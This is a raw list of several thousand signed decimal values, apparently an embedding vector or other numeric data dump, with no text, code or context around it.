0.023353800177574158, -0.022523969411849976, 0.016922613605856895, -0.007472178898751736, -0.005038256291300058, -0.033637769520282745, -0.00535685196518898, -0.013092057779431343, -0.01800435781478882, 0.007824115455150604, -0.02079021744430065, 0.0038972394540905952, 0.007249902933835983, -0.0078685712069273, -0.025191280990839005, 0.044603388756513596, 0.03319321945309639, 0.022301694378256798, -0.006338571198284626, 0.022197965532541275, -0.01493694819509983, 0.02369462326169014, -0.04383283108472824, 0.017159707844257355, -0.02750295214354992, -0.011350895278155804, -0.024865277111530304, -0.012039951048791409, 0.037846196442842484, 0.02871806174516678, 0.01161021739244461, 0.012032541446387768, -0.02141258865594864, -0.03215593099594116, -0.01262527797371149, 0.022953703999519348, -0.024939369410276413, 0.018730459734797478, 0.007290653418749571, 0.03337103873491287, 0.018611911684274673, 0.04543321952223778, -0.018389636650681496, -0.04181752726435661, 0.03248193487524986, -0.017959902063012123, -0.0033304356038570404, -0.024213267490267754, 0.02166450209915638, 0.005419830325990915, -0.007235084194689989, 0.01825626939535141, -0.018033994361758232, -0.046707600355148315, -0.0278437752276659, -0.026332298293709755, -0.012795689515769482, -0.003986150026321411, -0.040958061814308167, 0.012291863560676575, -0.027310313656926155, -0.02977016754448414, 0.01517404243350029, 0.005497626960277557, -0.018626730889081955, -0.046796511858701706, -0.01713007129728794, -0.001796731143258512, -0.004060241859406233, -0.075336754322052, 0.006434890441596508, 0.03334140405058861, 0.017352348193526268, -0.010083922185003757, 0.014440531842410564, 0.006775713991373777, 0.018463727086782455, -0.0040083774365484715, 0.01469244435429573, -0.04487011954188347, -0.019738109782338142, -0.014462759718298912, 0.01392188761383295, -0.015188860706984997, 0.0008284412324428558, -0.030214719474315643, -0.006657166872173548, 0.00422324426472187, 0.007698159199208021, 0.005230895709246397, 0.03757946565747261, -0.008868812583386898, 0.001443867920897901, -0.049878738820552826, 0.02304261364042759, -0.05204222351312637, 0.026747213676571846, 0.01646324433386326, 0.011810265481472015, 0.040365323424339294, -0.02677685022354126, 0.02327970787882805, -0.018211815506219864, -0.011743582785129547, -0.016744792461395264, -0.014514624141156673, -0.0649046003818512, 0.011654672212898731, -0.016374332830309868, 0.049226727336645126, -0.023175979033112526, -0.029236705973744392, -0.006975762080401182, 0.01469244435429573, -0.02231651172041893, 0.05429461970925331, 0.008253849111497402, 0.00840203370898962, 0.049878738820552826, 0.008142711594700813, -0.007235084194689989, 0.005723607260733843, 0.032896850258111954, -0.009009587578475475, -0.03003689832985401, 0.011913994327187538, 0.0067312587052583694, -0.09294100850820541, -0.028421692550182343, 0.011002662591636181, -0.042232442647218704, -0.03467505797743797, -0.010735931806266308, -0.012788279913365841, 0.006460822653025389, -0.0030618521850556135, -0.0004848395474255085, 0.034289781004190445, -0.023250071331858635, -0.01718934439122677, 0.009276319295167923, 0.01132125873118639, -0.022612880915403366, -0.03224484249949455, -0.024228084832429886, -0.0014753571012988687, -0.022909248247742653, 0.024702275171875954, 0.011299030855298042, -0.00016230779874604195, -0.0008492796332575381, -0.03378595411777496, 0.012840144336223602, -0.006427481304854155, 0.03126682713627815, -0.011995495297014713, -0.018078450113534927, 0.03150391951203346, -0.010135786607861519, -0.0481894388794899, -0.008572445251047611, 0.004634454846382141, 0.08179757744073868, -0.05942178890109062, 0.040454234927892685, 0.018923098221421242, -0.028510604053735733, -0.04578885808587074, 0.021620046347379684, 0.009431912563741207, -0.008476125076413155, 0.016329877078533173, -0.015307408757507801, -0.02905888482928276, -0.024865277111530304, 0.0032822757493704557, -0.014996222220361233, 0.00030169339152053, -0.0022635108325630426, 0.017559805884957314, 0.028214234858751297, 0.021857142448425293, -0.025057915598154068, 0.001185472123324871, -0.02376871556043625, 0.0036434743087738752, -0.012469684705138206, -0.05313878506422043, 0.015048086643218994, -0.028510604053735733, -0.014299756847321987, 0.006868328899145126, 0.015588957816362381, -0.0005228117224760354, 0.022701790556311607, 0.007390677463263273, 0.0033434017095714808, -0.03686818107962608, 0.049700915813446045, -0.022449877113103867, -0.03633471950888634, 0.023072250187397003, 0.025383921340107918, -0.017752444371581078, 0.012973509728908539, 0.0014392371522262692, 0.018359998241066933, 0.02937007136642933, 0.007690750062465668, 0.003300798824056983, -0.03292648866772652, 0.006457118317484856, 0.02256842516362667, -0.008616900071501732, -0.01155835296958685, -0.03692745417356491, -0.006505277939140797, 0.023250071331858635, 0.02044939436018467, 0.01640396937727928, 0.01979738473892212, -0.015077723190188408, 0.018241452053189278, 0.02173859439790249, -0.04261772334575653, 0.020241936668753624, 0.0035471548326313496, -0.0070276265032589436, -0.024880096316337585, -0.009313365444540977, -0.025546923279762268, -0.0360383503139019, -0.012477093376219273, 0.001757832826115191, 0.011128619313240051, -0.012432638555765152, -0.026391571387648582, -0.010209877975285053, 0.055954281240701675, 0.021960871294140816, -0.026510119438171387, 0.002672869013622403, 0.048248715698719025, 0.01954547129571438, -0.022983340546488762, -0.030051717534661293, -0.025502467527985573, -0.06288929283618927, -0.009757917374372482, -0.001686519244685769, 0.0007006325176917017, -0.015381500124931335, 0.015722323209047318, -0.006586779374629259, 0.006694212555885315, 0.014981403946876526, -0.027414042502641678, 0.02953307330608368, 0.006234842352569103, 0.027710409834980965, 0.014092299155890942, -0.003356367815285921, 0.014396077021956444, -0.03271903097629547, -0.01529258955270052, -0.006449709180742502, 0.029355252161622047, -0.005668038502335548, -0.0023579781409353018, 0.011817675083875656, 0.03027399256825447, -0.025517286732792854, -0.00637191254645586, -0.004723365418612957, -0.022938884794712067, 0.008313123136758804, -0.006012566387653351, -0.01066924910992384, 0.0072387889958918095, 0.022820336744189262, -0.007135060150176287, -0.002022711792960763, -0.011395350098609924, 0.006386730819940567, -0.00673496350646019, -0.015366681851446629, -0.012291863560676575, 0.0234427098184824, 0.017055978998541832, 0.002832166850566864, 0.03301539644598961, 0.017885809764266014, 0.006764600053429604, -0.011825083754956722, -0.013121694326400757, 0.013647747226059437, 0.049552734941244125, -0.009468958713114262, -0.00019124998652841896, 0.0026710168458521366, -0.006049612071365118, -0.0014151573413982987, -0.013840386644005775, 0.0027858593966811895, 0.006264478899538517, 0.00586438225582242, -0.016329877078533173, -0.020879127085208893, 0.022049780935049057, 0.0009432838414795697, 0.022909248247742653, 0.005342033691704273, -0.02167932130396366, -0.018315544351935387, 0.0009182777721434832, -0.009009587578475475, -0.012484502978622913, -0.011521306820213795, 0.022864792495965958, 0.006712735630571842, 0.009691234678030014, -0.009231863543391228, -0.022286875173449516, -0.019990023225545883, -0.010172832757234573, 0.028851427137851715, 0.0076240673661231995, -0.007542565930634737, 0.020834671333432198, 0.0033748908899724483, 0.002346864202991128, 0.02313152328133583, -0.024228084832429886, -0.008179757744073868, -0.023190798237919807, 0.01810808666050434, 0.040217138826847076, 0.004623340908437967, 0.009631960652768612, -0.0008678025915287435, -0.020330846309661865, 0.002061610110104084, 0.01010614912956953, 0.0065460288897156715, -0.034704696387052536, -0.0009946852223947644, 0.0017754297005012631, -0.009024405851960182, 0.022820336744189262, 0.03852784261107445, 0.015381500124931335, 0.0016439163591712713, -0.00561987841501832, -0.01954547129571438, 0.03194847330451012, -0.026436027139425278, 0.045907407999038696, 0.025932202115654945, 0.01213627029210329, 0.014321984723210335, 0.00880953948944807, 0.0017226390773430467, 0.015559321269392967, -0.026910215616226196, -0.01488508377224207, -0.01339583471417427, -0.006053316872566938, -0.026080386713147163, -0.00982460007071495, 0.009965375065803528, 0.01662624627351761, 0.02476154826581478, -0.0017124514561146498, -0.035830892622470856, -0.019767746329307556, 0.0060384985990822315, 0.0018124757334589958, 0.015262953005731106, -0.008372396230697632, -0.005616174079477787, 0.0135143818333745, -0.03085191175341606, 0.017826536670327187, 0.025087552145123482, -0.03126682713627815, 0.01298091933131218, 0.024909732863307, 0.0024283654056489468, 0.01825626939535141, -0.033637769520282745, 0.011758401058614254, 0.039802223443984985, -0.006045907735824585, -0.022523969411849976, 0.005253123119473457, -0.0018004357116296887, 0.01816735975444317, 0.01954547129571438, -0.009313365444540977, 0.02977016754448414, 0.022820336744189262, -0.013492153957486153, 0.015959417447447777, 0.017633898183703423, 0.021708957850933075, -0.027028763666749, -0.01095820777118206, -0.03698672726750374, -0.015677867457270622, -0.004682614933699369, 0.005067893303930759, 0.01801917515695095, -0.05355370044708252, -0.016759611666202545, 0.03156319260597229, 0.015322227030992508, -0.007275835145264864, -0.033963773399591446, -0.023250071331858635, 0.0045455447398126125, -0.028066052123904228, 0.02612484060227871, -0.016537334769964218, 0.023398255929350853, -0.005330919753760099, -0.026035930961370468, 0.007727796211838722, 0.003669406520202756, 0.013358788564801216, -0.019426923245191574, 0.020227117463946342, 0.002915520453825593, -0.009031815454363823, 0.027073219418525696, -0.05260532349348068, -0.016522517427802086, -0.002054200740531087, -0.009372638538479805, -0.010765568353235722, 0.020730942487716675, -0.004019491374492645, -0.013062420301139355, 0.021294042468070984, -0.027162129059433937, -0.010565520264208317, -0.0028117916081100702, -0.03843893110752106, 0.037046004086732864, -0.0566655658185482, 0.018730459734797478, 0.007816706784069538, 0.010817432776093483, -0.012551185674965382, 0.009402275085449219, 0.000033833421184681356, -0.005171622149646282, -0.0344083271920681, -0.02597665786743164, -0.012751233763992786, -0.00046816887333989143, 0.020345665514469147, 0.013180967420339584, 0.0091725904494524, 0.007757432758808136, -0.019263921305537224, 0.039150215685367584, -0.0025098666083067656, 0.008935496211051941, -0.013714429922401905, 0.015351863577961922, 0.0029081113170832396, 0.002969237044453621, -0.019782565534114838, -0.02800677716732025, -0.029740530997514725, -0.041669342666864395, 0.003097045933827758, 0.017959902063012123, -0.024391088634729385, 0.009920919314026833, 0.0027099151629954576, 0.01136571355164051, 0.004204721190035343, 0.004219539929181337, 0.01923428475856781, -0.026999127119779587, 0.02733995020389557, -0.0344083271920681, -0.007160992361605167, -0.027488134801387787, 0.03218556568026543, 0.007950072176754475, -0.013721839524805546, -0.03301539644598961, 0.036305081099271774, -0.0013466222444549203, 0.016922613605856895, 0.03003689832985401, -0.0010761864250525832, 0.03052590601146221, 0.0002602481690701097, 0.011091573163866997, 0.021308861672878265, -0.011098982766270638, 0.033963773399591446, -0.007838933728635311, 0.000980792916379869, -0.015107359737157822, -0.00989869236946106, 0.018448909744620323, 0.010847069323062897, -0.012069587595760822, -0.042973361909389496, 0.03843893110752106, -0.031770650297403336, -0.017589442431926727, -0.043714284896850586, 0.05550973117351532, -0.0042528812773525715, -0.042321354150772095, -0.02492455020546913, 0.01858227513730526, 0.00897254142910242, -0.029503436759114265, 0.003108159638941288, 0.01161021739244461, 0.007520338520407677, 0.026510119438171387, 0.04291408881545067, -0.03304503485560417, 0.02019748091697693, 0.007168401498347521, -0.041106246411800385, -0.014099708758294582, 0.01778208091855049, 0.008587263524532318, -0.017248619347810745, -0.0236057136207819, -0.022197965532541275, 0.007587021216750145, 0.005827336106449366, 0.038913119584321976, -0.011395350098609924, 0.016433605924248695, 0.025591379031538963, 0.0017874696059152484, -0.020078932866454124, -0.01761907897889614, 0.007512929383665323, 0.003471210366114974, 0.019175011664628983, -0.040928423404693604, 0.00029706262284889817, -0.0021023605950176716, 0.01249932125210762, 0.027858594432473183, 0.012840144336223602, -0.013003147207200527, 0.0021134745329618454, -0.02387244440615177, -0.005449466872960329, 0.0048085711896419525, 0.0028062346391379833, 0.015025858767330647, -0.00046562193892896175, 0.04552212730050087, -0.013047602027654648, 0.004812275525182486, 0.0006283927941694856, 0.012684551067650318, -0.0031433533877134323, -0.0324523001909256, -0.026406390592455864, 0.05687302350997925, 0.0029784985817968845, -0.008046391420066357, -0.05219040811061859, -0.025220919400453568, 0.028925519436597824, -0.014418303966522217, -0.02410953864455223, 0.02077539823949337, 0.03043699637055397, 0.04270663112401962, 0.022183146327733994, 0.016092782840132713, -0.00217089569196105, 0.0086835827678442, -0.012440048158168793, -0.005127166863530874, -0.01404043473303318, 0.003971331287175417, -0.03423050791025162, 0.0010428449604660273, 0.026021111756563187, -0.0007432354032061994, -0.0010734079405665398, 0.0226276982575655, 0.021234769374132156, 0.011691718362271786, -0.008646536618471146, -0.006294115912169218, -0.017752444371581078, -0.011210120283067226, -0.02492455020546913, -0.01416639145463705, 0.00673496350646019, -0.010476609691977501, 0.030614817515015602, -0.0021042129956185818, -0.0007978783105500042, -0.013314333744347095, -0.020390119403600693, -0.014144163578748703, -0.010861887596547604, -0.01078779622912407, -0.0383203849196434, -0.03633471950888634, -0.018285907804965973, -0.008735447190701962, 0.006194091867655516, -0.03458614647388458, 0.0030655567534267902, -0.0006103328778408468, 0.002721028868108988, 0.01948619820177555, -0.00839462410658598, -0.0081130750477314, -0.002882179105654359, -0.000810381316114217, -0.0186711847782135, -0.011587989516556263, 0.007394382264465094, 0.019249102100729942, -0.003495290409773588, 0.019352830946445465, 0.013781112618744373, -0.021308861672878265, -0.0239317175000906, 0.06573442369699478, -0.02142740786075592, 0.0019300967687740922, 0.027147309854626656, -0.001983813475817442, 0.01010614912956953, -0.027399223297834396, -0.0016948545817285776, -0.01290682703256607, -0.01058774720877409, -0.02052348479628563, -0.02516164444386959, 0.00832053180783987, -0.016448425129055977, 0.026673121377825737, 0.02904406562447548, 0.023309344425797462, -0.01367738377302885, 0.03123718872666359, -0.0162261500954628, 0.008483534678816795, 0.033104307949543, 0.05061965808272362, -0.004630750510841608, 0.030125809833407402, 0.006064430810511112, 0.025576559826731682, 0.025087552145123482, -0.008046391420066357, 0.008690992370247841, -0.046944696456193924, 0.00993573758751154, -0.005367965903133154, -0.007353631313890219, -0.020167844370007515, 0.020419755950570107, 0.008290895260870457, -0.011699127964675426, -0.013595882803201675, 0.03725346177816391, -0.019041646271944046, -0.009491185657680035, -0.0402764156460762, 0.028036415576934814, -0.008742856793105602, -0.005260532256215811, 0.0011910289758816361, -0.011336077004671097, -0.02547283098101616, 0.014462759718298912, 0.006220024079084396, -0.029399707913398743, 0.013521791435778141, 0.02597665786743164, 0.012669732794165611, -0.008942904882133007, 0.03052590601146221, -0.011054527014493942, 0.006616415921598673, -0.02530982904136181, 0.025443194434046745, -0.030125809833407402, 0.033074669539928436, -0.006942420732229948, 0.009750507771968842, 0.026347117498517036, 0.00369163416326046, -0.0025709925685077906, 0.010335834696888924, 0.015485228970646858, 0.02370944246649742, -0.001884715398773551, 0.020078932866454124, -0.011958450078964233, -0.022657334804534912, -0.004630750510841608, -0.01274382509291172, 0.001944915158674121, 0.0007923213997855783, 0.01711525395512581, -0.036571815609931946, 0.00010314996325178072, -0.012277045287191868, -0.022938884794712067, 0.016107602044939995, 0.011098982766270638, -0.00875767506659031, 0.045314669609069824, -0.059925615787506104, -0.009557868354022503, -0.027295494452118874, 0.027547407895326614, -0.003863898105919361, 0.0004876180028077215, 0.004830798599869013, -0.0353863425552845, 0.00030887103639543056, 0.0035508594010025263, -0.04412919655442238, -0.026154477149248123, 0.03612726181745529, -0.023590894415974617, 0.016996705904603004, -0.009787553921341896, -0.018730459734797478, 0.0006700695957988501, 0.03633471950888634, -0.00013336561096366495, 0.00407506013289094, 0.028303146362304688, 0.011654672212898731, -0.027221402153372765, -0.010002420283854008, -0.018893461674451828, 0.005112348590046167, 0.018448909744620323, 0.0071646966971457005, 0.004878958687186241, -0.017663534730672836, 0.008987360633909702, 0.004160265903919935, -0.020419755950570107, 0.018597092479467392, -0.014670217409729958, 0.004449225030839443, 0.010528474114835262, 0.020834671333432198, 0.0043417913839221, -0.027384405955672264, 0.010120968334376812, -0.043951377272605896, -0.023472348228096962, -0.0042084259912371635, -0.02367980405688286, 0.006034793797880411, 0.03019990213215351, -0.005460580810904503, -0.03230411559343338, -0.008965132758021355, -0.018849005922675133, 0.019100919365882874, 0.01695225015282631, 0.027473315596580505, 0.00382314738817513, 0.004382542334496975, -0.020227117463946342, 0.022657334804534912, 0.030140627175569534, -0.008542807772755623, 0.009268909692764282, -0.011247166432440281, 0.014070072211325169, -0.009854236617684364, 0.019827021285891533, 0.020182661712169647, 0.004052832722663879, -0.0030544428154826164, -0.02782895788550377, -0.03743128105998039, -0.013447699137032032, 0.0003734700148925185, 0.027206584811210632, 0.0034526875242590904, -0.024124357849359512, -0.020730942487716675, 0.00039037223905324936, 0.012528957799077034, -0.0009330962202511728, 0.013618110679090023, -0.019293557852506638, -0.007905617356300354, -0.03301539644598961, -0.015366681851446629, 0.022420240566134453, -0.015959417447447777, 0.017070798203349113, -0.018404453992843628, 0.01435903087258339, 0.007564793806523085, -0.017159707844257355, 0.009491185657680035, -0.014396077021956444, 0.0017439405201002955, -0.013306924141943455, -0.04756706580519676, -0.027236221358180046, 0.0020041887182742357, -0.00022285485465545207, -0.013047602027654648, 0.011424987576901913, -0.02124958671629429, -0.016507698222994804, 0.055391184985637665, 0.020464211702346802, -0.01932319439947605, 0.013699611648917198, -0.013010555878281593, 0.016907796263694763, 0.006746076978743076, -0.024228084832429886, 0.00791302602738142, -0.005927360616624355, 0.021056948229670525, 0.01640396937727928, 0.0006154267466627061, 0.016433605924248695, -0.0007261016289703548, -0.023072250187397003, -0.028125325217843056, 0.04685578495264053, 0.012758643366396427, 0.0035193702206015587, 0.0231167059391737, 0.005230895709246397, 0.017707988619804382, 0.006405253894627094, 0.0011160108260810375, 0.014633171260356903, -0.0025376512203365564, -0.00446404330432415, 0.002248692326247692, 0.009498595260083675, -0.010291379876434803, 0.012099224142730236, -0.013069829903542995, -0.009254091419279575, -0.01607796549797058, -0.013329152017831802, 0.01727825589478016, -0.003758316859602928, -0.04051350802183151, -0.020819853991270065, 0.01120271161198616, -0.020182661712169647, 0.010083922185003757, 0.0050715976394712925, -0.01197326835244894, 0.02222760207951069, 0.007801888044923544, 0.014225665479898453, -0.03025917522609234, 0.0013086500111967325, -0.017500530928373337, -0.007479588035494089, -0.005175326485186815, 0.007323994766920805, 0.01809326745569706, -0.0036805204581469297, 0.014299756847321987, 0.017500530928373337, -0.0231167059391737, -0.00013093446614220738, 0.0048530264757573605, -0.020271573215723038, 0.029503436759114265, -0.0034749151673167944, 0.0012317795772105455, -0.03221520408987999, -0.03565307334065437, 0.013262469321489334, -0.02719176560640335, 0.008831767365336418, 0.021723775193095207, -0.012365955859422684, 0.012076997198164463, -0.012165906839072704, 0.004534430801868439, 0.007183219771832228, 0.005656924564391375, 0.008061210624873638, 0.012825326062738895, 0.007053558714687824, -0.023324163630604744, 0.010202469304203987, -0.046381596475839615, 0.0011530568590387702, -0.023264890536665916, 0.005227190908044577, -0.029755350202322006, -0.015166633762419224, -0.006783123128116131, 0.016107602044939995, 0.013173558749258518, -0.015885325148701668, 0.012262227013707161, 0.004541839938610792, 0.030407359823584557, -0.009832008741796017, 0.01914537511765957, 0.027532588690519333, -0.007079490926116705, 0.0017420882359147072, 0.01189176645129919, -0.006590483710169792, -0.008742856793105602, -0.02385762520134449, -0.017055978998541832, 0.005693970713764429, 0.019338013604283333, 0.008194576017558575, 0.001157687627710402, -0.004204721190035343, -0.014314575120806694, -0.03018508292734623, -0.007809297181665897, 0.0006533988635055721, -0.02273142710328102, 0.00008590042125433683, -0.009728279896080494, -0.0014318280154839158, 0.006238546688109636, 0.027636317536234856, 0.01274382509291172, 0.006268183700740337, 0.02030120976269245, -0.017811717465519905, 0.022183146327733994, 0.03319321945309639, -0.008239030838012695, -0.01751535013318062, 0.006401549093425274, 0.011750992387533188, -0.005642106290906668, -0.02962198294699192, 0.0012021427974104881, -0.006034793797880411, 0.009609732776880264, -0.00266731227748096, 0.012114042416214943, -0.030303630977869034, -0.017633898183703423, 0.015366681851446629, -0.007809297181665897, 0.008831767365336418, 0.028036415576934814, 0.024776367470622063, 0.002265363000333309, -0.0011160108260810375, 0.02977016754448414, -0.008705810643732548, -0.0030507382471114397, 0.01932319439947605, -0.038764938712120056, -0.0360383503139019, 0.02052348479628563, 0.008816949091851711, -0.0026691644452512264, -0.002761779585853219, -0.008839176036417484, -0.017352348193526268, -0.002474673092365265, 0.00356938224285841, -0.012395592406392097, -0.016048328951001167, 0.013573654927313328, -0.0034063798375427723, 0.027399223297834396, 0.011936222203075886, 0.010624793358147144, -0.04676687344908714, -0.022523969411849976, 0.016359515488147736, 0.02215350978076458, -0.00940968468785286, -0.009913510642945766, -0.015277771279215813, 0.003360072383657098, 0.032659754157066345, -0.0036582928150892258, 0.025132007896900177, -0.03520851954817772, 0.04303263500332832, -0.005049370229244232, 0.016166875138878822, 0.0015309260925278068, 0.009372638538479805, -0.0009196670143865049, -0.021308861672878265, 0.008216802962124348, -0.004649273119866848, -0.01630024053156376, 0.006149636581540108, -0.003241525264456868, 0.02905888482928276, 0.007109127938747406, -0.020330846309661865, -0.019901111721992493, 0.005553195718675852, -0.0016522516962140799, -0.015136996284127235, -0.01607796549797058, 0.004297336097806692, 0.01939728669822216, 0.013358788564801216, 0.015559321269392967, 0.022123873233795166, 0.017885809764266014, -0.01988629437983036, 0.019100919365882874, 0.018893461674451828, 0.0072424933314323425, 0.002094951458275318, 0.015277771279215813, -0.013907069340348244, -0.004682614933699369, 0.0021968279033899307, 0.01131384912878275, -0.02443554252386093, -0.01237336453050375, -0.004297336097806692, -0.009883873164653778, 0.012528957799077034, -0.01972329244017601, 0.030303630977869034, -0.006560847163200378, -0.0010678509715944529, 0.03182992711663246, 0.021531136706471443, 0.006497868802398443, -0.021620046347379684, -0.009246681816875935, 0.014381257817149162, -0.011395350098609924, -0.007175810635089874, -0.02385762520134449, -0.0031785471364855766, -0.004412178881466389, 0.021308861672878265, 0.003971331287175417, -0.0042084259912371635, -0.022583242505788803, -0.021131040528416634, 0.01680406741797924, -0.03683854639530182, -0.018478546291589737, 0.016329877078533173, -0.011595399118959904, -0.00022239178360905498, 0.007883389480412006, 0.002017154823988676, 0.012099224142730236, 0.0029284865595400333, -0.0015957566211000085, -0.008542807772755623, 0.010439563542604446, -0.01107675489038229, 0.01399597991257906, 0.04033568874001503, -0.0010345096234232187, -0.006557142361998558, -0.021531136706471443, 0.010995253920555115, -0.0037879538722336292, 0.04128406569361687, -0.0019652904011309147, -0.006938716396689415, -0.021442227065563202, 0.005816222634166479, 0.017070798203349113, -0.00023524211428593844, -0.002061610110104084, -0.02239060401916504, -0.004697433207184076, -0.017396802082657814, 0.0170411616563797, -0.027399223297834396, -0.0023579781409353018, -0.020893946290016174, 0.0021653389558196068, -0.026584211736917496, 0.0077500236220657825, -0.0022561014629900455, 0.02928115986287594, 0.006353389471769333, -0.007572202943265438, -0.010217287577688694, 0.011706536635756493, 0.024035446345806122, 0.012099224142730236, -0.010935979895293713, 0.0017911741742864251, 0.04875253885984421, 0.00038921457598917186, -0.016033509746193886, -0.03950585797429085, 0.0065460288897156715, -0.00048020880785770714, 0.020345665514469147, -0.016196511685848236, -0.004019491374492645, 0.02668794058263302, -0.03580125793814659, -0.008305713534355164, -0.003456392092630267, 0.008335351012647152, -0.003285980550572276, 0.00045381352538242936, 0.010172832757234573, 0.03052590601146221, -0.008868812583386898, -0.0007645369041711092, 0.018567455932497978, 0.00533462455496192, -0.011410168372094631, -0.011936222203075886, 0.001416083425283432, 0.015677867457270622, 0.021116221323609352, -0.012654914520680904, 0.014929539524018764, -0.004845617339015007, -0.033637769520282745, -0.009706052951514721, 0.0005093825166113675, 0.001963438233360648, 0.03666072338819504, 0.018152540549635887, 0.009957965463399887, -0.009328183718025684, 0.00832053180783987, -0.02646566368639469, -0.021042129024863243, 0.017900628969073296, 0.03159283101558685, 0.01315133087337017, -0.00393428560346365, 0.0032933896873146296, 0.009350410662591457, -0.004093583207577467, -0.013017965480685234, -0.016329877078533173, -0.002396876458078623, -0.0074388375505805016, 0.013418062590062618, -0.014944357797503471, -0.008579853922128677, -0.014788764528930187, 0.01392188761383295, -0.010506246238946915, -0.023561257869005203, 0.004534430801868439, -0.018152540549635887, -0.0039046485908329487, 0.008194576017558575, -0.015840871259570122, 0.0000824273593025282, 0.02750295214354992, 0.009883873164653778, 0.02003447897732258, -0.008535399101674557, -0.02004929631948471, 0.023309344425797462, -0.02409471943974495, 0.006801646202802658, -0.012929054908454418, 0.009372638538479805, -0.004497384652495384, 0.008379805833101273, 0.005956997163593769, -0.01375147607177496, -0.027547407895326614, 0.011565761640667915, -0.008098255842924118, 0.0007450877455994487, 0.014270120300352573, -0.012239999137818813, 0.012766052968800068, 0.008387215435504913, 0.007994526997208595, -0.004982687532901764, 0.004234358202666044, 0.010098740458488464, 0.016492880880832672, -0.008979951031506062, -0.017544986680150032, -0.008624309673905373, -0.02280551940202713, -0.03108900599181652, -0.006238546688109636, -0.014588715508580208, -0.005690265912562609, 0.0035823483485728502, 0.021649684756994247, 0.008409442380070686, 0.002154225017875433, -0.013062420301139355, -0.019456559792160988, 0.00876508466899395, 0.009572687558829784, -0.004338087048381567, -0.0029229295905679464, -0.0002177610294893384, 0.016774430871009827, 0.03663108870387077, -0.013699611648917198, 0.00856503564864397, 0.007535156793892384, 0.0004301966982893646, -0.014351621270179749, -0.02190159633755684, -0.01310687605291605, 0.036482904106378555, 0.02953307330608368, 0.0013920034980401397, 0.00815012026578188, -0.016537334769964218, -0.022820336744189262, -0.00036698696203529835, -0.024050265550613403, 0.002485786797478795, -0.018893461674451828, 0.012269635684788227, -0.016107602044939995, -0.009839418344199657, 0.005397602450102568, -0.01119530200958252, 0.017055978998541832, -0.0016624393174424767, 0.04169898107647896, -0.008728038519620895, -0.04724106192588806, 0.015885325148701668, 0.004356610123068094, 0.00407506013289094, 0.015381500124931335, 0.01981220208108425, 0.02240542322397232, -0.005075302440673113, -0.02766595408320427, 0.012721597217023373, -0.0037342370487749577, 0.0027747456915676594, -0.012010314501821995, -0.012847553938627243, 0.005419830325990915, 0.0040565375238657, -0.01963438093662262, -0.010091330856084824, -0.0009298546938225627, -0.0035471548326313496, -0.006231137551367283, -0.007972300052642822, 0.0019764043390750885, -0.016433605924248695, 0.001680036191828549, 0.01767835207283497, 0.010528474114835262, -0.010202469304203987, 0.010847069323062897, -0.009261501021683216, -0.019456559792160988, 0.01505549531430006, 0.0020523485727608204, 0.011284212581813335, -0.0035860531497746706, 0.015618594363331795, 0.01363292895257473, 0.003556416369974613, -0.000724712444934994, 0.003845375031232834, 0.007064672652631998, -0.027651136741042137, 0.01042474526911974, -0.014373849146068096, -0.016374332830309868, 0.01590014435350895, -0.0040083774365484715, 0.015944600105285645, -0.026895398274064064, -0.027206584811210632, 0.007398086600005627, -0.033815592527389526, 0.010654430836439133, -0.0022283170837908983, -0.00994314718991518, 0.01711525395512581, 0.005612469278275967, 0.028184598311781883, 0.013951524160802364, 0.017026342451572418, 0.025665471330285072, 0.015781596302986145, -0.00446404330432415, 0.012714188545942307, -0.016670702025294304, 0.01542595587670803, 0.008061210624873638, -0.012188134714961052, -0.0257247444242239, -0.002094951458275318, 0.014381257817149162, -0.00431956397369504, -0.008372396230697632, -0.002895145211368799, 0.0186711847782135, -0.008898450061678886, -0.00673496350646019, -0.010743340477347374, -0.03577161952853203, -0.023753896355628967, -0.013803340494632721, -0.006664576008915901, -0.003345254110172391, 0.012877190485596657, -0.002237578621134162, 0.004000968299806118, 0.0029173726215958595, 0.024850457906723022, -0.035504888743162155, -0.014536851085722446, -0.014588715508580208, 0.006749781779944897, -0.010083922185003757, -0.006108885630965233, -0.01387002319097519, -0.012966101057827473, 0.011943630874156952, 0.0043417913839221, -0.037698011845350266, 0.0006552511476911604, -0.015618594363331795, -0.017307892441749573, 0.005934769753366709, -0.0023653872776776552, -0.0009011439979076385, -0.014981403946876526, 0.0069313072599470615, -0.033074669539928436, -0.004434406291693449, 0.024539271369576454, 0.018715640529990196, -0.0265397559851408, 0.0017550543416291475, -0.03194847330451012, 0.030318448320031166, 0.01095820777118206, 0.008676174096763134, 0.0051160529255867004, -0.0032656050752848387, 0.008913268335163593, 0.017426440492272377, -0.008698401041328907, -0.012677142396569252, 0.006438595242798328, -0.011306440457701683, -0.015003630891442299, -0.011669490486383438, -0.013218013569712639, 0.014670217409729958, -0.005216076970100403, -0.01825626939535141, 0.024568909779191017, -0.010291379876434803, -0.006190387066453695, 0.014840628951787949, 0.00798711832612753, -0.00022887483646627516, -0.001796731143258512, 0.00803157314658165, 0.005997747648507357, -0.002469116123393178, -0.002661755308508873, -0.0021746002603322268, -0.020227117463946342, 0.005271646194159985, 0.014010798186063766, -0.009179999120533466, 0.011232348158955574, 0.0035397454630583525, -0.0033748908899724483, -0.0009242977830581367, -0.011639853939414024, 0.020819853991270065, 0.0050715976394712925, 0.015144405886530876, 0.018463727086782455, -0.009365229867398739, -0.005427239462733269, 0.023190798237919807, 0.007801888044923544, 0.008364987559616566, -0.003124830313026905, 0.007416609674692154, 0.005371670238673687, -0.016196511685848236, 0.00014552133507095277, -0.015514865517616272, -0.0004945641267113388, -0.0314742848277092, -0.018893461674451828, -0.006023679859936237, 0.0199752040207386, 0.000290579569991678, 0.005797699559479952, 0.00856503564864397, 0.005304987542331219, 0.00981719046831131, 0.011876948177814484, 0.03992077335715294, -0.0017976572271436453, -0.02133849821984768, 0.00048067187890410423, -0.00045798119390383363, -0.004378837533295155, -0.009794963523745537, 0.011736174114048481, -0.022820336744189262, -0.005319805815815926, 0.01818217895925045, 0.03227447718381882, -0.008327941410243511, -0.01695225015282631, 0.007920435629785061, 0.019930750131607056, 0.008224212564527988, -0.010691476054489613, 0.001922687515616417, 0.020434575155377388, 0.032333750277757645, 0.0037768399342894554, 0.021308861672878265, -0.0008247366058640182, 0.0009034593822434545, -0.0019764043390750885, -0.04072096571326256, -0.00675348611548543, 0.010032057762145996, 0.004104697145521641, -0.005082711577415466, -0.0069794668816030025, -0.019204648211598396, -0.010876706801354885, 0.010921161621809006, -0.019678836688399315, -0.002259806264191866, 0.028703242540359497, 0.011691718362271786, -0.008453898131847382, -0.031622469425201416, 0.009869054891169071, 0.026910215616226196, -0.018285907804965973, 0.025043098255991936, 